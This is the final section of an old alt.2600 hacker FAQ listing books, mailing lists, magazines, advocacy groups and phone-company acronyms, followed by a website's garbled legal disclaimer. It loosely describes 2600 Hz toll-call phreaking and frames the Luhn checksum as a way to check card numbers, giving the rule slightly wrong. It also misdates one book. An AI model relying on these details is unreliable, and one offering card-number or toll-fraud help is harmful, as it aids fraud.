                                    published information.  The only secret we learn from reading
                                    the book is that Sylvia Moon is a younger woman madly in love
                                    with the older David Stang.
                                    
                                    Complete Lan Security and Control
                                    Author: Peter Davis
                                    Publisher: Windcrest / McGraw Hill
                                    Copyright Date: 1994
                                    ISBN: 0-8306-4548-9 and 0-8306-4549-7
                                    
                                    Network Security
                                    Author: Steven Shaffer and Alan Simon
                                    Publisher: AP Professional
                                    Copyright Date: 1994
                                    ISBN: 0-12-638010-4
                                    
                                    
                                    Cryptography
                                    ~~~~~~~~~~~~
                                    Applied Cryptography: Protocols, Algorithms, and Source Code in C
                                    Author: Bruce Schneier
                                    Publisher: John Wiley & Sons
                                    Copyright Date: 1994
                                    ISBN: 0-471-59756-2
                                    
                                    Bruce Schneier's book replaces all other texts on
                                    cryptography.  If you are interested in cryptography, this is
                                    a must read.  This may be the first and last book on
                                    cryptography you may ever need to buy.
                                    
                                    Cryptography and Data Security
                                    Author: Dorothy Denning
                                    Publisher: Addison-Wesley Publishing Co.
                                    Copyright Date: 1982
                                    ISBN: 0-201-10150-5
                                    
                                    Programmed Threats
                                    ~~~~~~~~~~~~~~~~~~
                                    The Little Black Book of Computer Viruses
                                    Author: Mark Ludwig
                                    Publisher: American Eagle Publications
                                    Copyright Date: 1990
                                    ISBN: 0-929408-02-0
                                    
                                    The original, and still the best, book on computer viruses.
                                    No media hype here, just good clean technical information.
                                    
                                    Computer Viruses, Artificial Life and Evolution
                                    Author: Mark Ludwig
                                    Publisher: American Eagle Publications
                                    Copyright Date: 1993
                                    ISBN: 0-929408-07-1
                                    
                                    Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
                                    Threats to Your System
                                    Author: John McAfee and Colin Haynes
                                    Publisher: St. Martin's Press
                                    Copyright Date: 1989
                                    ISBN: 0-312-03064-9 and 0-312-02889-X
                                    
                                    
                                    Hacking History and Culture
                                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                    The Hacker Crackdown: Law and Disorder on the Electronic Frontier
                                    Author: Bruce Sterling
                                    Publisher: Bantam Books
                                    Copyright Date: 1982
                                    ISBN: 0-553-56370-X
                                    
                                    Bruce Sterling has recently released the book FREE to the net.
                                    The book is much easier to read in print form, and the
                                    paperback is only $5.99.  Either way you read it, you will be
                                    glad you did.  Mr. Sterling is an excellent science fiction
                                    author and has brought his talent with words to bear on the
                                    hacking culture.  A very enjoyable reading experience.
                                    
                                    Cyberpunk
                                    Author: Katie Hafner and John Markoff
                                    Publisher: Simon and Schuster
                                    Copyright Date: 1991
                                    ISBN: 0-671-77879-X
                                    
                                    The Cuckoo's Egg
                                    Author: Cliff Stoll
                                    Publisher: Simon and Schuster
                                    Copyright Date: 1989
                                    ISBN: 0-671-72688-9
                                    
                                    Hackers: Heroes of the Computer Revolution
                                    Author: Steven Levy
                                    Publisher: Doubleday
                                    Copyright Date: 1984
                                    ISBN: 0-440-13495-6
                                    
                                    
                                    Unclassified
                                    ~~~~~~~~~~~~
                                    The Hacker's Handbook
                                    Author: Hugo Cornwall
                                    Publisher: E. Arthur Brown Company
                                    Copyright Date:
                                    ISBN: 0-912579-06-4
                                    
                                    Secrets of a Super Hacker
                                    Author: The Knightmare
                                    Publisher: Loompanics
                                    Copyright Date: 1994
                                    ISBN: 1-55950-106-5
                                    
                                    The Knightmare is no super hacker.  There is little or no real
                                    information in this book.  The Knightmare gives useful advice
                                    like telling you not to dress up before going trashing.
                                    The Knightmare's best hack is fooling Loompanics into
                                    publishing this garbage.
                                    
                                    The Day The Phones Stopped
                                    Author: Leonard Lee
                                    Publisher: Primus / Donald I Fine, Inc.
                                    Copyright Date: 1992
                                    ISBN: 1-55611-286-6
                                    
                                    Total garbage.  Paranoid delusions of a lunatic.  Less factual
                                    data that an average issue of the Enquirer.
                                    
                                    Information Warfare
                                    Author: Winn Swartau
                                    Publisher: Thunder Mountain Press
                                    Copyright Date: 1994
                                    ISBN: 1-56025-080-1
                                    
                                    
                                    09. What are some mailing lists of interest to hackers?
                                    
                                    Academic Firewalls
                                    Reflector Address:
                                    Registration Address: Send a message to majordomo@greatcircle.com
                                    containing the line "subscribe firewalls user@host"
                                    
                                    Bugtraq
                                    Reflector Address:    bugtraq@crimelab.com
                                    Registration Address: bugtraq-request@crimelab.com
                                    
                                    Cert Tools
                                    Reflector Address:    cert-tools@cert.org
                                    Registration Address: cert-tools-request@cert.org
                                    
                                    Computers and Society
                                    Reflector Address:    Comp-Soc@limbo.intuitive.com
                                    Registration Address: taylor@limbo.intuitive.com
                                    
                                    Coordinated Feasibility Effort to Unravel State Data
                                    Reflector Address:    ldc-sw@cpsr.org
                                    Registration Address:
                                    
                                    CPSR Announcement List
                                    Reflector Address:    cpsr-announce@cpsr.org
                                    Registration Address:
                                    
                                    CPSR - Intellectual Property
                                    Reflector Address:    cpsr-int-prop@cpsr.org
                                    Registration Address:
                                    
                                    CPSR - Internet Library
                                    Reflector Address:    cpsr-library@cpsr.org
                                    Registration Address:
                                    
                                    Macintosh Security
                                    Reflector Address:    mac-security@eclectic.com
                                    Registration Address: mac-security-request@eclectic.com
                                    
                                    NeXT Managers
                                    Reflector Address:
                                    Registration Address: next-managers-request@stolaf.edu
                                    
                                    rfc931-users
                                    Reflector Address:    rfc931-users@kramden.acf.nyu.edu
                                    Registration Address: brnstnd@nyu.edu
                                    
                                    RSA Users
                                    Reflector Address:    rsaref-users@rsa.com
                                    Registration Address: rsaref-users-request@rsa.com
                                    
                                    
                                    10. What are some print magazines of interest to hackers?
                                    
                                    2600 - The Hacker Quarterly
                                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                    E-mail address: 2600@well.sf.ca.us
                                    
                                    Subscription Address: 2600 Subscription Dept
                                    PO Box 752
                                    Middle Island, NY  11953-0752
                                    
                                    Letters and article submission address: 2600 Editorial Dept
                                    PO Box 99
                                    Middle Island, NY  11953-0099
                                    
                                    Subscriptions: United States: $21/yr individual, $50 corporate.
                                    Overseas: $30/yr individual, $65 corporate.
                                    
                                    
                                    Gray Areas
                                    ~~~~~~~~~~
                                    Gray Areas
                                    PO Box 808
                                    Broomall, PA 19008
                                    
                                    Subscriptions: $18/yr
                                    
                                    
                                    Wired
                                    ~~~~~
                                    Subscription Address: subscriptions@wired.com
                                    or: Wired
                                    PO Box 191826
                                    San Francisco, CA 94119-9866
                                    
                                    Letters and article submission address: guideleines@wired.com
                                    or: Wired
                                    544 Second Street
                                    San Francisco, CA 94107-1427
                                    
                                    Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas)
                                    
                                    
                                    11. What are some organizations of interest to hackers?
                                    
                                    Computer Professionals for Social Responsibility (CPSR)
                                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                    CPSR empowers computer professionals and computer users to advocate
                                    for the responsible use of information technology and empowers all who
                                    use computer technology to participate in the public debate.   As
                                    technical experts, CPSR members provide the public and policymakers
                                    with realistic assessments of the power, promise, and limitations of
                                    computer technology.  As an organization of concerned citizens, CPSR
                                    directs public attention to critical choices concerning the
                                    applications of computing and how those choices affect society.
                                    
                                    By matching unimpeachable technical information with policy
                                    development savvy, CPSR uses minimum dollars to have maximum impact
                                    and encourages broad public participation in the shaping of technology
                                    policy.
                                    
                                    Every project we undertake is based on five principles:
                                    
                                    *  We foster and support public discussion of and public
                                    responsibility for decisions involving the use of computers in
                                    systems critical to society.
                                    
                                    *  We work to dispel popular myths about the infallibility of
                                    technological systems.
                                    
                                    *  We challenge the assumption that technology alone can solve
                                    political and social problems.
                                    
                                    *  We critically examine social and technical issues within the
                                    computer profession, nationally and internationally.
                                    
                                    *  We encourage the use of computer technology to improve the quality
                                    of life.
                                    
                                    CPSR Membership Categories
                                    75  REGULAR MEMBER
                                    50  Basic member
                                    200  Supporting member
                                    500  Sponsoring member
                                    1000  Lifetime member
                                    20  Student/low income member
                                    50  Foreign subscriber
                                    50  Library/institutional subscriber
                                    
                                    CPSR National Office
                                    P.O. Box 717
                                    Palo Alto, CA  94301
                                    415-322-3778
                                    415-322-3798 (FAX)
                                    E-mail: cpsr@csli.stanford.edu
                                    
                                    
                                    Electronic Frontier Foundation (EFF)
                                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                    The Electronic Frontier Foundation (EFF) is dedicated to the pursuit
                                    of policies and activities that will advance freedom and openness in
                                    computer-based communications. It is a member-supported, nonprofit
                                    group that grew from the conviction that a new public interest
                                    organization was needed in the information age; that this organization
                                    would enhance and protect the democratic potential of new computer
                                    communications technology. From the beginning, the EFF determined to
                                    become an organization that would combine technical, legal, and public
                                    policy expertise, and would apply these skills to the myriad issues
                                    and concerns that arise whenever a new communications medium is born.
                                    
                                    Memberships are $20.00 per year for students, $40.00 per year for
                                    regular members, and $100.00 per year for organizations.
                                    
                                    The Electronic Frontier Foundation, Inc.
                                    666 Pennsylvania Avenue S.E., Suite 303
                                    Washington, D.C.  20003
                                    +1 202 544 9237
                                    +1 202 547 5481 FAX
                                    Internet: eff@eff.org
                                    
                                    
                                    Free Software Foundation (FSF)
                                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                    
                                    
                                    GNU
                                    ~~~
                                    
                                    
                                    The League for Programming Freedom (LPF)
                                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                    The League for Programming Freedom is an organization of people who
                                    oppose the attempt to monopolize common user interfaces through "look
                                    and feel" copyright lawsuits.  Some of us are programmers, who worry
                                    that such monopolies will obstruct our work.  Some of us are users,
                                    who want new computer systems to be compatible with the interfaces we
                                    know.  Some are founders of hardware or software companies, such as
                                    Richard P. Gabriel. Some of us are professors or researchers,
                                    including John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S.
                                    Boyer and Patrick Winston.
                                    
                                    "Look and feel" lawsuits aim to create a new class of government-
                                    enforced monopolies broader in scope than ever before.  Such a system
                                    of user-interface copyright would impose gratuitous incompatibility,
                                    reduce competition, and stifle innovation.
                                    
                                    We in the League hope to prevent these problems by preventing
                                    user-interface copyright.  The League is NOT opposed to copyright law
                                    as it was understood until 1986 -- copyright on particular programs.
                                    Our aim is to stop changes in the copyright system which would take
                                    away programmers' traditional freedom to write new programs compatible
                                    with existing programs and practices.
                                    
                                    Annual dues for individual members are $42 for employed professionals,
                                    $10.50 for students, and $21 for others.  We appreciate activists, but
                                    members who cannot contribute their time are also welcome.
                                    
                                    To contact the League, phone (617) 243-4091, send Internet mail to the
                                    address league@prep.ai.mit.edu, or write to:
                                    
                                    League for Programming Freedom
                                    1 Kendall Square #143
                                    P.O. Box 9171
                                    Cambridge, MA 02139 USA
                                    
                                    
                                    SotMesc
                                    ~~~~~~~
                                    Founded in 1989, SotMesc is dedicated to preserving the integrity and
                                    cohesion of the computing society.  By promoting computer education,
                                    liberties and efficiency, we believe we can secure freedoms for all
                                    computer users while retaining privacy.
                                    
                                    SotMesc maintains the CSP Internet mailing list, the SotMesc
                                    Scholarship Fund, and the SotMesc Newsletter.
                                    
                                    The SotMESC is financed partly by membership fees, and donations, but
                                    mostly by selling hacking, cracking, phreaking, electronics, internet,
                                    and virus information and programs on disk and bound paper media.
                                    
                                    SotMesc memberships are $20 to students and $40 to regular members.
                                    
                                    SotMESC
                                    P.O. Box 573
                                    Long Beach, MS  39560
                                    
                                    
                                    
                                    
                                    Section D: 2600
                                    ~~~~~~~~~~~~~~~
                                    
                                    01. What is alt.2600?
                                    
                                    Alt.2600 is a Usenet newsgroup for discussion of material relating to
                                    2600 Magazine, the hacker quarterly.   It is NOT for the Atari 2600
                                    game machine.  Len@netsys.com created the group on Emmanual
                                    Goldstein's recommendation.  Emmanuel is the editor/publisher of 2600
                                    Magazine. Following the barrage of postings about the Atari machine to
                                    alt.2600, an alt.atari.2600 was created to divert all of the atari
                                    traffic from alt.2600.  Atari 2600 people are advised to hie over to
                                    rec.games.video.classic.
                                    
                                    
                                    02. What does "2600" mean?
                                    
                                    2600Hz was a tone that was used by early phone phreaks (or
                                    phreakers) in the 80's, and some currently.  If the tone was sent down the
                                    line at the proper time, one could get away with all sorts of fun stuff.  
                                    
                                    A note from Emmanuel Goldstein:
                                    
                                    "The Atari 2600 has NOTHING to do with blue boxes or telephones
                                    or the 2600 hertz tone.  The 2600 hertz tone was simply the first
                                    step towards exploring the network.  If you were successful at 
                                    getting a toll call to drop, then billing would stop at that
                                    point but there would be billing for the number already dialed
                                    up until the point of seizure.  800 numbers and long distance
                                    information were both free in the past and records of who called
                                    what were either non-existent or very obscure with regards to
                                    these numbers.  This, naturally, made them more popular than
                                    numbers that showed up on a bill, even if it was only for
                                    a minute.  Today, many 800 numbers go overseas, which provides
                                    a quick and free way into another country's phone system
                                    which may be more open for exploration."
                                    
                                    
                                    03. Are there on-line versions of 2600 available?
                                    
                                    No.
                                    
                                    
                                    04. I can't find 2600 at any bookstores.  What can I do?
                                    
                                    Subscribe.  Or, let 2600 know via the subscription address that you
                                    think 2600 should be in the bookstore.  Be sure to include the
                                    bookstores name and address.
                                    
                                    
                                    05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
                                    
                                    A note from Emmanuel Goldstein:
                                    
                                    We've been selling 2600 at the same newsstand price ($4) since 1988
                                    and we hope to keep it at that price for as long as we can get away
                                     with it. At the same time, $21 is about the right price to cover
                                      subscriber costs, including postage and record keeping, etc. People
                                      who subscribe don't have to worry about finding an issue someplace,
                                      they tend to get issues several weeks before the newsstands get
                                      them, and they can take out free ads in the 2600 Marketplace.
                                    
                                    
                                    
                                    
                                    Section E: Miscellaneous
                                    ~~~~~~~~~~~~~~~~~~~~~~~~
                                    
                                    01. What does XXX stand for?
                                    
                                    TLA     Three Letter Acronym
                                    
                                    ACL     Access Control List
                                    PIN     Personal Identification Number
                                    TCB     Trusted Computing Base
                                    
                                    ALRU    Automatic Line Record Update
                                    AN      Associated Number
                                    ARSB    Automated Repair Service Bureau
                                    ATH     Abbreviated Trouble History
                                    BOC     Bell Operating Company
                                    BOR     Basic Output Report
                                    CA      Cable
                                    COE     Central Office Equipment
                                    CMC     Construction Maintenance Center
                                    CNID    Calling Number IDentification
                                    CO      Central Office
                                    COCOT   Customer Owned Coin Operated Telephone
                                    CRSAB   Centralized Repair Service Answering Bureau
                                    DDD     Direct Distance Dialing
                                    ECC     Enter Cable Change
                                    LD      Long Distance
                                    LMOS    Loop Maintenance Operations System
                                    MLT     Mechanized Loop Testing
                                    NPA     Numbering Plan Area
                                    POTS    Plain Old Telephone Service
                                    RBOC    Regional Bell Operating Company
                                    RSB     Repair Service Bureau
                                    SS      Special Service
                                    TAS     Telephone Answering Service
                                    TH      Trouble History
                                    TREAT   Trouble Report Evaluation and Analysis Tool
                                    
                                    FLT     Fairlight
                                    NTA     The Nocturnal Trading Alliance
                                    PDX     Paradox
                                    PE      Public Enemy
                                    QTX     Quartex
                                    S!P     Supr!se Productions
                                    TDT     The Dream Team
                                    THG     The Humble Guys
                                    THP     The Hill People
                                    TRSI    Tristar Red Sector Inc.
                                    
                                    
                                    02. How do I determine if I have a valid credit card number?
                                    
                                    Credit cards us the Luhn Check Digit Algorithm.  The main purpose of
                                    this algorithm is to catch data entry errors, but it does double duty
                                    here as a weak security tool.
                                    
                                    For a card with an even number of digits, double every odd digit and
                                    subtract 9 if the product is greater than 10.  Add up all the even
                                    digits as well as the doubled-odd digits, and the result must be a
                                    multiple of 10 or it's not a valid card.  If the card has an odd
                                    number of digits, perform the same addition doubling the even digits
                                    instead.
                                    
                                    
                                    03. Where can I get a copy of the #hack FAQ?
                                    
                                    Find it on FTP at:
                                    rahul.net /pub/lps
                                    
                                    Find it on World Wide Web at:
                                    http://dfw.net/~aleph1
                                    http://www.engin.umich.edu/~jgotts/underground.html
                                    http://www.phantom.com/~king
                                    
                                    Find it with Finger at:
                                    will@gnu.ai.mit.edu
                                    
                                    
                                    
                                    EOT
                                    -- 
                                    \* Will Spencer        : The advancement and diffusion of knowledge *\
                                    \* Unix geek           : is the only guardian of true liberty.      *\
                                    \* PC guru             :               --  James Madison            *\
                                    \* Revolutionary       :               4th U.S. President           *\
                                    
                                    

This material is the authors only no part in small or whole may be copied without the authors consent if material is copied the author will be notified if illigaly copied this website has a ip adress tracking system and when caught you may be punished to the full extent of the law and high money fine.
COPYRIGHT 2004
 

THIS WEBSITE IS DISTRIBUTED FOR EDUCATIONAL
PURPESES ONLY WE ARE NOT RESONSIBLE FOR THE USE OF THIS INFORMATION IN ANYWAY OR ANY DAMAGE IT MAY CAUSE, ONCE YOU ENTER THIS WEBSITE YOU ARE AGREEING TO BE RESPONSIBLE FOR ANYTHING THIS WEBSITE MIGHT CONFLIGHT WITH AND WAVE ALL RIGHTS THAT INVOLE THIS WEBSITE IN ANYWAY NO ONE EXCEPT THE AUTHOR MAY OVERIDE THESE RISTRECTIONS AND WHEN THEY ARE OVERWRITEN THIS SHOULD NOT APPEAR.
THESE TERMS TAKE EFFECT THE MOMENT YOU ACCESS THIS WEBPAGE IN ANY WAY
 

Copyright: